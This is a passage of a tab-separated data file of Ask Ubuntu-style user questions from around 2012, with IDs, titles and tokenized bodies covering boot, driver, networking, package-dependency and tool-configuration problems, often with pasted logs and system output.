( filter ) : -- > 0 ok debconf ( filter ) : < -- progress set 50 debconf ( filter ) : widget found for ubiquity/install/title debconf ( filter ) : -- > 0 ok` debconf ( filter ) : < -- progress set 51 debconf ( filter ) : widget found for ubiquity/install/title debconf ( filter ) : -- > 0 ok` debconf ( filter ) : < -- progress set 52 it went on like that for a long time , always incrementing progress set by one . then i got : ubuntu cron [ 10439 ] : ( root ) cmd ( cd/ & & run-parts -- report /etc/cron.hourly ) ubuntu kernel : [ 2385.874396 ] e1000e 0000:00:19.0 : > irq 55 for msi-x it was like that all night . edit : i tried again , putting `` nomodeset '' after `` quiet splash '' in grub . its going on three hours now ... .
220046	crash when booting system error no wubildr	erorr no wubildr then boot with red pix-elated screen after i log in it freezes and lines of code pop up . i think it may be a hex dump . what do i do ? i have a fx 4100 and a radeon 6670 graphics card .
220048	ubuntu 12.04 wireless wo n't connect with gnome network manager or wicd	i have an hp pavilion slimline s3100n and i can not for the life of me get the wifi to connect and stay connected in any circumstances with network manager or wicd ... i 'm pulling my freaking hair out with this , and i ca n't get a dang thing down at all ... switching to wicd did n't work , putting my password in the connections editor did n't work ... nothing at all is working ... everything that everyone else is saying to me is chinese and i really just want my pc to work ... please help ... i will provide any information needed to help me with this . just instruct me on how to find that information . do n't pass this question by without helping me please ... i 'm so frustrated ... lspci -nn information iceblueirish @ iceblueirish-michael 's desktop : ~ $ lspci -nn 00:00.0 ram memory [ 0500 ] : nvidia corporation c51 host bridge [ 10de:02f0 ] ( rev a2 ) 00:00.1 ram memory [ 0500 ] : nvidia corporation c51 memory controller 0 [ 10de:02fa ] ( rev a2 ) 00:00.2 ram memory [ 0500 ] : nvidia corporation c51 memory controller 1 [ 10de:02fe ] ( rev a2 ) 00:00.3 ram memory [ 0500 ] : nvidia corporation c51 memory controller 5 [ 10de:02f8 ] ( rev a2 ) 00:00.4 ram memory [ 0500 ] : nvidia corporation c51 memory controller 4 [ 10de:02f9 ] ( rev a2 ) 00:00.5 ram memory [ 0500 ] : nvidia corporation c51 host bridge [ 10de:02ff ] ( rev a2 ) 00:00.6 ram memory [ 0500 ] : nvidia corporation c51 memory controller 3 [ 10de:027f ] ( rev a2 ) 00:00.7 ram memory [ 0500 ] : nvidia corporation c51 memory controller 2 [ 10de:027e ] ( rev a2 ) 00:04.0 pci bridge [ 0604 ] : nvidia corporation c51 pci express bridge [ 10de:02fb ] ( rev a1 ) 00:05.0 vga compatible controller [ 0300 ] : nvidia corporation c51 [ geforce 6150 le ] [ 10de:0241 ] ( rev a2 ) 00:09.0 ram memory [ 0500 ] : nvidia corporation mcp51 host bridge [ 10de:0270 ] ( rev a2 ) 00:0a.0 isa bridge [ 0601 ] : nvidia corporation mcp51 lpc bridge [ 10de:0260 ] ( rev a3 ) 00:0a.1 smbus [ 0c05 ] : nvidia corporation mcp51 smbus [ 10de:0264 ] ( rev a3 ) 00:0a.2 ram memory [ 0500 ] : nvidia corporation mcp51 memory controller 0 [ 10de:0272 ] ( rev a3 ) 00:0b.0 usb controller [ 0c03 ] : nvidia corporation mcp51 usb controller [ 10de:026d ] ( rev a3 ) 00:0b.1 usb controller [ 0c03 ] : nvidia corporation mcp51 usb controller [ 10de:026e ] ( rev a3 ) 00:0e.0 ide interface [ 0101 ] : nvidia corporation mcp51 serial ata controller [ 10de:0266 ] ( rev a1 ) 00:0f.0 ide interface [ 0101 ] : nvidia corporation mcp51 serial ata controller [ 10de:0267 ] ( rev a1 ) 00:10.0 pci bridge [ 0604 ] : nvidia corporation mcp51 pci bridge [ 10de:026f ] ( rev a2 ) 00:10.1 audio device [ 0403 ] : nvidia corporation mcp51 high definition audio [ 10de:026c ] ( rev a2 ) 00:14.0 bridge [ 0680 ] : nvidia corporation mcp51 ethernet controller [ 10de:0269 ] ( rev a3 ) 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration [ 1022:1100 ] 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map [ 1022:1101 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller [ 1022:1102 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control [ 1022:1103 ] 02:05.0 firewire ( ieee 1394 ) [ 0c00 ] : lsi corporation fw322/323 [ 11c1:5811 ] ( rev 70 ) 02:09.0 communication controller [ 0780 ] : conexant systems , inc. hsf 56k data/fax modem [ 14f1:2f20 ] lsusb information bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0bc2:3300 seagate rss llc bus 001 device 004 : id 058f:6377 alcor micro corp. multimedia card reader bus 001 device 005 : id 15a9:0004 gemtek wubr-177g [ ralink rt2571w ] bus 002 device 002 : id 093a:2510 pixart imaging , inc. optical mouse
220049	adding nodes to maas server	i was able to install maas server using ubuntu 12.04 . then boot up nodes from he pxe . then installed maas-precise-x86-64-commissioning through pxe . now the installation is done . but im unable to commission with the maas server . it does not show it as a node and neither im unable to add it manually and end up with following error . also what is the default username password for maas-precise-x86-64-commissioning . im unable to login . this error when adding node manually . ========================================================================== error 2012-11-20 08:32:54,500 maas.maasserver # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # exception : timed out # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error 2012-11-20 08:32:54,501 maas.maasserver traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/django/core/handlers/base.py '' , line 111 , in get_response response = callback ( request , *callback_args , **callback_kwargs ) file `` /usr/lib/python2.7/dist-packages/django/views/decorators/vary.py '' , line 22 , in inner_func response = func ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 166 , in __call__ result = self.error_handler ( e , request , meth , em_format ) file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 164 , in __call__ result = meth ( request , *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/maasserver/api.py '' , line 251 , in dispatcher self , request , request.method , *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/maasserver/api.py '' , line 193 , in perform_api_operation return method ( handler , request , *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/maasserver/api.py '' , line 493 , in new node = create_node ( request ) file `` /usr/lib/python2.7/dist-packages/maasserver/api.py '' , line 418 , in create_node return form.save ( ) file `` /usr/lib/python2.7/dist-packages/maasserver/forms.py '' , line 234 , in save node = super ( nodewithmacaddressesform , self ) .save ( ) file `` /usr/lib/python2.7/dist-packages/django/forms/models.py '' , line 363 , in save fail_message , commit , construct=false ) file `` /usr/lib/python2.7/dist-packages/django/forms/models.py '' , line 85 , in save_instance instance.save ( ) file `` /usr/lib/python2.7/dist-packages/maasserver/models.py '' , line 114 , in save return super ( commoninfo , self ) .save ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/django/db/models/base.py '' , line 460 , in save self.save_base ( using=using , force_insert=force_insert , force_update=force_update ) file `` /usr/lib/python2.7/dist-packages/django/db/models/base.py '' , line 570 , in save_base created= ( not record_exists ) , raw=raw , using=using ) file `` /usr/lib/python2.7/dist-packages/django/dispatch/dispatcher.py '' , line 172 , in send response = receiver ( signal=self , sender=sender , **named ) file `` /usr/lib/python2.7/dist-packages/maasserver/provisioning.py '' , line 485 , in provision_post_save_node profile , power_type , preseed_data ) file `` /usr/lib/python2.7/dist-packages/maasserver/provisioning.py '' , line 245 , in __call__ result = self.method ( *args ) 259,1 93 % result = self.method ( *args ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1224 , in __call__ return self.__send ( self.__name , args ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1578 , in __request verbose=self.__verbose file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1264 , in request return self.single_request ( host , handler , request_body , verbose ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1294 , in single_request response = h.getresponse ( buffering=true ) file `` /usr/lib/python2.7/httplib.py '' , line 1030 , in getresponse response.begin ( ) file `` /usr/lib/python2.7/httplib.py '' , line 407 , in begin version , status , reason = self._read_status ( ) file `` /usr/lib/python2.7/httplib.py '' , line 365 , in _read_status line = self.fp.readline ( ) file `` /usr/lib/python2.7/socket.py '' , line 447 , in readline data = self._sock.recv ( self._rbufsize ) timeout : timed out
220051	uefi not letting met boot ubuntu after installing it for first time	i am trying to install ubuntu for the first time . i am using an usb stick . at partition i used one of the hdd 's i had and created a partition of 50gb for ubuntu @ /dev/sda and the partition 's name is dev/sda1 with type ext4 . all seems well and the installation is completed without any errors and i got a dialogue asking me to restart but ubuntu does not boot . i only have one device as boot in my bios and i think it 's the devide with ubuntu on it since i 've not partitioned the other discs . when i create the partition i used primary type and location for the new partition is at the beginning of the space . and i use ext4 file system . mount point is / what am i doing wrong ?
220053	random freezes on mbp9,2 + ubuntu 12.04	i have a mbp9,2 ( mid-2012 ) at work . i put ubuntu 12.04 on it after some efforts . everything works more or less now , except i get random freezing every now and then . i have to power off the machine to restore it . wondering if anyone had the similar issue . my setup : macbook pro 9,2 ( mid 2012 ) ubuntu 12.04 ( installed using the special image for macs ) no proprietary drivers xmonad on unity 2d so far the freezes look to be sporadic and spontaneous .
220055	what is juju doing when my deployment is `` pending '' ? it seems to take awhile without much happening	after deploying a charm , either locally or not , juju status lists `` pending '' . it seems to sit in this state for awhile , longer in my experience in the cloud , a bit shorter locally . what is juju doing during this time ? for local instances it 's a couple minutes or less , longer with cloud instances , up to 10 minutes in some cases . i am just curious if deploy 's stay pending when the vm is being setup or is something else going on ?
220057	not able to boot after installing ubuntu 12.10 and 12.04	i am using an intel based acer laptop and the first time i installed kubuntu 12.10 i got a blank screen . after this i tried ubuntu 12.04 but the result is the same . i tried many times but the result is frustrating . if i am connected to an external screen i am able to see my screen on an external device . i have also tried with f6 and selecting kernel but it does not work . i have tried several options but i am not able to boot my system . i do not have any operating system , earlier i was using windows 7 but now i am trying to install only a linux based operating system .
220058	bluetooth : hci0 command tx timeout error when using wiimote ( on ubuntu 12.04 )	i am trying to connect a wiimote ( on ubuntu 12.04 ) through a belkin f8t013xx bluetooth dongle . i can sync it by pressing 1+2 and the wiimote is detected , but after a while , the connection dies . dmesg shows me the following bluetooth : hci0 command tx timeout error when using wiimote . when i try to shut down my system after that , its takes a very long to shut down . what could be happening ? could someone help me out..
220060	i removed something called unity webapp integration ( i do n't remember exactly ) , and now i do n't have unity , how to revert this ?	yesterday i think i removed something called unity webapp integration ( i do n't remember exactly ) now when i log in to ubuntu , only the image of the desktop and its content are displayed , there 's no top bar , no sidebar on the left . i 'm pretty much unable to do anything . how can i get it back to normal ?
220063	how to publish gpg key in ubuntu 12.10	this link works for ubuntu 10 https : //launchpad.net/+help-registry/openpgp-keys.html # publish how can i do this in ubuntu 12.10 because its different in ubuntu 12.10 .
220065	how to edit a file in vi editor ( arrow keys prints letters ) ?	i am open a file in vi : vi index.php here the problem is : when i press the down arrow and it prints 'b ' . why it prints 'b ' ?
220071	where is /etc/inittab in ubuntu ?	i have ubuntu lts 12.04 32 bit operating system on my laptop . but i could not find /etc/inittab . where is it moved ? do we have something new instead ?
220074	12.10 64 bit hangs on install	i have tried installing 12.10 now 5 times with no luck . every time it hangs up at the new features screen of the install . i 've tried burning slow . tried a cd and a dvd . on a clean hdd and tried overwriting a vista hdd . please help as i need this for school . thank you mike
220075	ansa wont start after upgrade to ubuntu 12.10	after updating ubuntu from 11.10 to 12.10 , the cae tool ansa 13.2.3 wont start . i 'm using a dell latitude e6330 ( core i5-3320m , intel hd graphics 4000 ) . i get the following from libgl_debug=verbose : libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/i965_dri.so libgl error : dlopen /usr/lib/x86_64-linux-gnu/dri/i965_dri.so failed ( /opt/ansa_v13.2.3/lib/linux/lib64/qt//lib/libgcc/libgcc_s.so.1 : version `gcc_3.4 ' not found ( required by /usr/lib/x86_64-linux-gnu/dri/i965_dri.so ) ) libgl : opendriver : trying $ { origin } /dri/tls/i965_dri.so libgl : opendriver : trying $ { origin } /dri/i965_dri.so libgl error : dlopen $ { origin } /dri/i965_dri.so failed ( $ { origin } /dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/dri/i965_dri.so libgl error : dlopen /usr/lib/dri/i965_dri.so failed ( /opt/ansa_v13.2.3/lib/linux/lib64/qt//lib/libgcc/libgcc_s.so.1 : version `gcc_3.4 ' not found ( required by /usr/lib/dri/i965_dri.so ) ) libgl error : unable to load driver : i965_dri.so libgl error : driver pointer missing libgl error : failed to load driver : i965 libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl error : dlopen /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so failed ( /opt/ansa_v13.2.3/lib/linux/lib64/qt//lib/libgcc/libgcc_s.so.1 : version `gcc_3.4 ' not found ( required by /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so ) ) libgl : opendriver : trying $ { origin } /dri/tls/swrast_dri.so libgl : opendriver : trying $ { origin } /dri/swrast_dri.so libgl error : dlopen $ { origin } /dri/swrast_dri.so failed ( $ { origin } /dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/dri/swrast_dri.so libgl error : dlopen /usr/lib/dri/swrast_dri.so failed ( /opt/ansa_v13.2.3/lib/linux/lib64/qt//lib/libgcc/libgcc_s.so.1 : version `gcc_3.4 ' not found ( required by /usr/lib/dri/swrast_dri.so ) ) libgl error : unable to load driver : swrast_dri.so libgl error : failed to load driver : swrast fatal signal : 11 caught exiting ! ! i checked in the synaptic package manager that gcc_3.4-base is available , as well as i965_dri.so and swrast.dri are in /usr/lib/x86_64-linux-gnu/dri/ . i 'm not so much into this stuff but need this to work , so i appreciate your help on this . thank you very much !
220079	there is no `` press any key to boot from cd or dvd '' !	i wrote the ubuntu iso on a cd and restarted my computer , but `` press any key to boot from cd or dvd ... `` did n't appear ! what should i do ? is it because ( i guess ) the file maybe is corrupted ? because when i see it 's propeties windows , it is written 687 megabytes ! ! ! ! ( v 12.10 ) thanks
220084	running apt-get update on a non-networked computer ( using data from another similar computer )	i have two computers : one has network access ( n ) , the other does n't ( nn ) . so i install ubuntu ( 11.10 ) fresh on both n and nn . on n ( the networked machine ) - i run 'apt-get update ' and 'apt-get upgrade ' . now , on nn ( the non-networked machine ) , i want to do the same . but nn wants a network connection to do the update and the upgrade . i know what to do for the 'apt-get upgrade ' part : i just copy the .deb files on n in the directory /var/cache/apt/archives/* to /var/cache/apt/archives/ . on nn . then apt upgrades from the local cache instead of wanting a network . however : how do i do the equivalent for the 'apt-get update ' part ? if i just copy the .bin files in /var/cache/apt on n to nn , then the system thinks i have already upgraded . thanks cecil
220092	how to see internet `` virtual museum '' that requires/uses quicktime ( in firefox or chrome ) ?	i am talking about this virtual visit in the musée de l’orangerie of paris . i have codecs needed for quicktime video ( i can play apple site videos like here ) but this is not just a video file in firefox i have this settings and the properties of that media this is the same in chrome
220104	how to resize byobu in ubuntu 12.10 ?	i was a happy user of byobu for many months . i was running it between two ubuntu 11.10 machines and i never had a problem with window sizes . from my laptop i would connect through ssh to my workstation , run byobu and then i could resize the terminal and byobu would always fill all the possible space . since i upgraded to 12.10 this does not work properly anymore . in the laptop i can resize it up to a maximum size ( which i assume is connected to the size of the original terminal where i run byobu in the workstation ) , but if i try to make it bigger i get something like : http : //ubuntuforums.org/attachment.php ? attachmentid=222048 & d=1343755591 i have tried f12+f and f12 : fit in order to try and resize the window , but i get no changes . anybody knows how to solve this ? thanks , ﾃ］gel de vicente
220107	can windows xp be better than any ubuntu ( and linux ) distro for an old pc ?	the old laptop is this toshiba 1800-100 : cpu : intel celeron 800mh ram 128 mb ( works ok ) hdd : 15 gb ( works ok ) graphics adapter : integrated 64-bit agp graphics accelerator , bitbit , 3d graphic acceleration , 8 mb video ram only windowsxp is installed , and works ok : it can be used , but it is slow ( and hateful ) . i thought that i could improve performance ( and its look ) easily , since it is an old pc ( drivers and everything known for years ... ) by installing a light linux distro . so , i decided to install a light or customized ubuntu distro , or ubuntu/debian derivative , but have n't been successful with any ; not even booting livecds : not even antix , not even puppy . lubuntu wiki says that the last two releases it wo n't work because they need more ram ( and some blogs say much more cpu -even core duo for new lubuntu ! - ) , let alone xubuntu . but the wikipedia says : '' a lightweight linux distribution is a linux distribution that uses relatively few resources . for example , lubuntu , which requires a minimum of 128 mb of ram and a pentium ii `` the problems i have faced are : 1.there are thousands of pages talking about the same 10/15 lightweight distros , and saying more or less the same things , but none talks about a simple thing as to how should the ram/swap-partition proportion be for this kind of installations . none ! 2.when booting the livecds , i have tried several different boot options ( though i do n't understand much about them , and there 's always a line of explanation missing ) and never receive error messages . booting just stops at different stages but often seems to stop just when the x server is going to start . i am also able to boot to command line but startx lives the pc in a state with no return displaying nothing . 3.i ignore whether the problem is ram size or a problem with the graphics driver ( which surprises me because it is a well known brand and line of computers ) . so i do n't know if doing a partition with a swap partition would help booting the livecd . 4.i would like to try the graphical interface with the livecd before installing . if doing the swap partition for this purpose would help . how can i do the partition ? i tried to use boot rescue cd , but it advises me against continuing forward . i would appreciate any ideas as regards these questions . thank you
220110	booting stops at disk checking	i am constantly face this problem . when i start my laptop it checks the disk for errors , after that it shows , `` some defects are found `` when i press 'f ' to fix errors , it shows /tmp is not ready message . what i need to do to overcome this problem ?
220111	always use one gpu	i got a linux-box with 2 gpu ( intel and nvidia ) . i 'm using bumblebee ( and primus ) for using the nvidia card , but i 'm quite far from be really satisfied . i would like to know if there is a way to disable intel gpu and make my system use only the nvidia card . thanks in advance .
220115	nautilus ( 11.10 ) , getting the old icon-list-small menu back on panel ?	after upgrade to 11.10 the menu for changing folder view has gone . now you have to go through the mainmenu - > view . i switch back and forth list / icon view a lot , so i really want that shothand menu back . it seems not to be an option in nautilus preferences , and there is no entry for it in dconf-editor - > org.gnome.nautilus either . is this `` feature '' for some obscure reason completely gone ?
220122	software center is broken and can not be repaired or reinstalled	when i open the software center , i am told that i can not use it , for it is broken , and needs to be repaired . first i try to do this automatically , as i was offered . i enter a root password , and then the installation fails . installarchives ( ) failed : reconfiguring packages ... reconfiguring packages ... reconfiguring packages ... reconfiguring packages ... ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 275048 files and directories currently installed . ) unpacking wine1.4-i386 ( from ... /wine1.4-i386_1.4-0ubuntu4.1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/wine1.4-i386_1.4-0ubuntu4.1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/wine ' , which is also in package wine1.5 1.5.5-0ubuntu1~ppa1~oneiric1+pulse17 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/wine1.4-i386_1.4-0ubuntu4.1_i386.deb error in function : dpkg : dependency problems prevent configuration of wine1.4-common : wine1.4-common depends on wine1.4 ( = 1.4-0ubuntu4.1 ) ; however : package wine1.4 is not installed . dpkg : error processing wine1.4-common ( -- configure ) : dependency problems - leaving unconfigured what should i do now ? first of all , i 've tried reinstalling the center , but it failed due to the same 1.4 dependency as is laid out here . i 've googled for help and although i do n't understand linux at all , i 've tried some suggestions : i 've tried editing the dpkg status in /var/lib/dpkg/status which failed because the file could not be found . i 've tried purging wine/* but that had unresolved dependencies as well . it 's a giant mess .
220123	how do i install pgadmin iii for postgresql 9.2 ?	i have a windows server that runs postgresql 9.2 . i want to hit it using pgadmin iii from my ubuntu 12.10 workstation box . i installed pgadmin iii from synaptic and also tried direct download from postgresql site using software installer . regardless , i can get only get pgadmin iii for postgresql 9.1 . when i run pgadmin iii and point to my server i get an error message telling me that the database is 9.2 and my pgadmin iii is for 9.1 , is n't compatible with 9.2 . i can access the server itself fine ok from the ubuntu box - i have python programs that hit the database with no problems - but i need pgadmin iii for 9.2 running under ubuntu 12.10 . is it available ? where do i get it ?
220125	how to access samba shares via nat ?	i have setup a virtual machine in virtual box and installed a samba server . i changed the guest operating system 's nic from bridged to nat for a reason that i ca n't remember . i then added a additional nic in `` host only adapter '' mode . the windows host os now can access the ubuntu 10.10 virtual server via the host only nic . however , i can not access the samba server running on the ubuntu guest os . i am not sure what to do now . how can i get the widows host os to access the guest os ' samba server .
220129	using x11 forwarding with ssh and vnc ?	i am working on a remote cluster via ssh with the -x option , because i need to visualize data and graphs , over a vpn protocol . sometime due to the instability of the internet connection i lose my session . they told me i could use vnc in order to not lose my current session , so that if the internet connection drops i can reconnect and continue with my previously open session . what i do is to log in the remote cluster 'remote.cluster ' and type vncserver :1 then i open another terminal on my system and i type ssh -c -nl 5901 : remote.cluster:5901 myusername @ remote.cluster & then i start vinagre on my system and i connect using ssh protocol . the problem is that i do not have x11 forwarding and i can not open windows . if i try to connect using the vnc protocol with vinagre it does n't connect , because i get something as connection timeout . what should i do ?
220135	error installation of ubuntu 12.04 lts	attempting a new installation of ubuntu 12.04 lts on what was a dual boot windows 7 and ubuntu 12.04 lts laptop ( sony intel i3 core 64 bit with 500gb hdd ) . i followed the following procedure install ubuntu • has at least 4.4 gb available , is connected to the internet , download updates while installing and install this third-party are all ticked this time • i chose the erase disk and install ubuntu option ( since i want to have only ubuntu 12.04 lts operating system in my disk ) now shows the entire disk will be used • 501gb free disk i clicked the install now button . all data copied to the hard drive ( it was copied ok ) , askes for location , keyboared layout , and who are you . started to install the ubuntu 12.04 operating system . after some minutes , i got a report installation failed , the installer encountered an unrecoverable error . a desktop session will now be run so that you may investigate the problem or try installing again . so , please give me simple advice on how to proceed . thank you
220136	access localhost from other pc	i 'm fresher for ubuntu 12.04.. , i just created a simple program called login.php and i would like to run this prog from anther pc that not in my lan . i had localhost in my system. , i 'm using apache2.0 and php5 . my program is located at var/www/login.php when ever i 'm trying to open it from others pc ( not in my network ) using ip it shoes oops. , what can i do to open my page from another pc using ip address . one thing i need to say , i.e. , i already run my program in other systems those in my lan. , by using my ip like 192.168.xx.xx/login.php . , it works . but my question is what about from another systems that not in my lan . simply my requirement is to run my database from others pc through ip.. is it possible . all of my friends said that it is not possible from outside of the lan
220142	installing nvidia drivers and control panel	i have ubuntu 12.04 . i downloaded the nvidia drivers but could n't get the .run file to work i installed the drivers for my gtx 570 via the additional drivers control panel and it says that they are active . when i open system- > details - > graphics it says that the driver is ubnknown . when i perform a search for `` nvidia '' all i get is the nvidia x server settings control panel . i tried apt-get install nvidia-settings and it said that it installed it but i ca n't find it anywhere . have i successfully installed 1 ) the drivers 2 ) the control panel . if 2 ) is true how can i find it ? thanks
220144	run command in new gnome-terminal and .bashrc	i 'm trying to launch one command in a new gnome-terminal window from a shell script , and it seems that my .bashrc file does n't get sourced when calling gnome-terminal and executing a command : gnome-terminal -t `` my title '' -e vim but it does when launching gnome-terminal alone : gnome-terminal -t `` my title '' ( for testing purposes , just add a echo `` something '' to the end of the .bashrc ) i also tried explicitly sourcing the .bashrc before running vim with no success : gnome-terminal -t `` my title '' -x $ shell -c `` source $ home/.bashrc ; vim '' am i missing something ?
220146	bash escaping and find command	i trying to remove boring \-escaping from this command : find . \ ( -name '*.mp3 ' -o -name '*.jpg ' \ ) -print by wrapping it in single quotes : find . ' ( -name *.mp3 -o -name *.jpg ) ' -print implying that arguments go straight to the find without any expansions . however the output is different .
220151	launcher missing after installing nvidia driver	i did a fresh install of ubuntu 12.10 and installed nvidia driver 'current ' . but on restart , the launcher icons went missing . the screen size reduced to 1024x768 . i am able to right click on the blank desktop and create a folder and an empty document , but how do i launch applications to fix this ?
220153	is there a client application for the cloud service cubby by logmein ?	logmein has provided clients for windows and macos but are currently `` working '' on a linux version . has anyone found/written one for linux . running ubuntu 12.04 .
220157	ubuntu is also slow for me ! how to complain about it ?	my system 's specs are decent and actually surpasses the documented minimum requirements for ubuntu 12.04 . but after tons of re-install and un-installs , i 've given up on this linux stuff ! i 'm back to using windows xp and windows 7 , which both works great on my machine . so disappointed with the hype that `` ubuntu is faster , ubuntu takes less resources , ubuntu this , ubuntu that ... '' it 's all false for me ! i have a p4 at 2ghz , 1gb ram , and a 128-bit radeon 9550 with 256ram . it 's not the newest , but its definitely capable - even for playing 3d games ! yes i 've downloaded drivers , updates , and what not , and even tried the 2d desktop , but everything is just slow ! and no this is not a rant , rather a real concern . why is it so slow , even for simple tasks ? am i gon na get shut down and be told that ubuntu is great and all , and that i just have a bad machine and do n't know what i 'm doing ? if this is so , should n't the community change the documented minimum sys . req . on the ubuntu site , so it wo n't give people false expectations ! so , please tell me how could i complain it to ubuntu ?
220158	installing ubuntu along win8	i 'm new to linux distro . i have 750 gb hdd on my pc and i made it 2 primary partitions and 3 logical partitions and i had windows 7 installed on one primary partition the other is empty for linux distro . all i want is to install ubuntu 12.10/linux mint 13/fedora 17 and i heard that uefi base boot does n't apply to linux and its already been disabled in my windows 8 boot menu and i also know that ntfs does n't apply to linux . so please help to choose right linux distro and give me every step by step to install linux distro on my pc and i want to know if i can make one partition in ntfs and the other partition suitable format for linux without loosing data or any malfunctioning . please , detailed steps as i 'm dummy in installing linux distros this 'll be my first time .
220162	can lubuntu 's `` lxsession-edit '' ( desktop session settings ) add new programs at startup or just remove them ?	it looks like the second is true , but i want to be sure . i would find it odd .
220164	vsftpd upload `` permission denied '' issue	hi i have installed and configured ftp server on ubuntu 12.04. vsftpd.config # anonymous_enable=yes write_enable=yes . when i drag and drops files to the sever with filezilla , it fails : ****550 permission denied . error : critical file transfer error . **** but when i try to do the same thing to another server on the internet , it works just fine . i even tried severe times to changes settings in the vsftpd.config file but it had the same problems respectively help thnks
220165	switch windows only in current workspace and display	i have recently acquired a second display for use with my laptop running ubuntu with xfce and compiz . however , one thing that has been bugging me is window switching : my second monitor has 2 windows open which would usually be on my 2nd workspace . now , when i switch windows , i will accidentally switch to one of the other windows on the 2nd display which is kind of annoying . how to fix this issue ?
220168	quick access to key-value storage for users	i 'm typing dozens of different values every day . i repeat typing the same set of values every day , including passwords , ips and long file paths . say i 'm typing a command in the terminal and need to insert a value i know the key of . with the tool i 'm looking for , i could press an hotkey , a small window would show , i 'll type the key or part of it into that window , then i 'll press enter and the value will be typed into the terminal ( or whichever window i 've been working with before ) . do you know of such or similar tool ?
220170	ubuntu 12.04 : virtual console is dimmed	my fresh installation ( with updates ... ) of ubuntu 12.04 ( 64bit , desktop ) automatically dims the virtual console as soon as a switch to one . after pressing ctrl+alt+fx , the screen starts dimming until it is completely black after 4-5 sec . unlike normal power saving , the console stays black even after keystrokes ( i can login ) until i switch back to x . back in x , the screen just `` undims '' until it has normal brightness . it might be worth to point out that i do n't even have a laptop but a standard desktop pc . so what can i do ? this is no duplicate of how to permanently disable monitor power saver using the command line ? . as i said , the virtual console is dimmed even if x is not running !
220171	how to workaround gettext dependency problem when installing wine ?	$ lang=c dpkg -l 'wine*' dpkg-query : no packages found matching wine* $ lang=c dpkg -l 'ia32*' desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-=================================-=====================-=====================-======================================================================= un ia32-apt-get < none > ( no description available ) ii ia32-libs 20090808ubuntu36 amd64 ia32 shared libraries - transitional package un ia32-libs-gtk < none > ( no description available ) ii ia32-libs-multiarch 20090808ubuntu36 i386 multi-arch versions of former ia32-libraries un ia32-libs-sdl < none > ( no description available ) $ grep wine /etc/apt/sources.list /etc/apt/sources.list.d/* /etc/apt/sources.list.d/ubuntu-wine-ppa-quantal.list : deb http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu quantal main /etc/apt/sources.list.d/ubuntu-wine-ppa-quantal.list : deb-src http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu quantal main $ lang=c sudo aptitude -f install no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . $ lang=c sudo aptitude install wine1.5-amd64 the following new packages will be installed : binfmt-support { a } fonts-droid { a } fonts-horai-umefont fonts-unfonts-core { a } gettext : i386 { ab } gettext-base : i386 { ab } libasprintf0c2 : i386 { a } libcapi20-3 { a } libgif4 : i386 { a } libgomp1 : i386 { a } libnss-winbind { a } libodbc1 { a } libosmesa6 { a } libosmesa6 : i386 { a } libpam-winbind { a } libtiff4 : i386 { a } ttf-droid { a } ttf-umefont { a } ttf-unfonts-core { a } unixodbc { a } unrar { a } winbind { a } wine-gecko1.8 { a } wine-gecko1.8 : i386 { a } wine-mono0.0.8 { a } wine1.5 { a } wine1.5-amd64 wine1.5-i386 : i386 { a } winetricks { a } 0 packages upgraded , 29 newly installed , 0 to remove and 0 not upgraded . need to get 165 mb of archives . after unpacking 474 mb will be used . the following packages have unmet dependencies : gettext-base : conflicts : gettext-base : i386 but 0.18.1.1-9ubuntu1 is to be installed . gettext-base : i386 : conflicts : gettext-base but 0.18.1.1-9ubuntu1 is installed . gettext : conflicts : gettext : i386 but 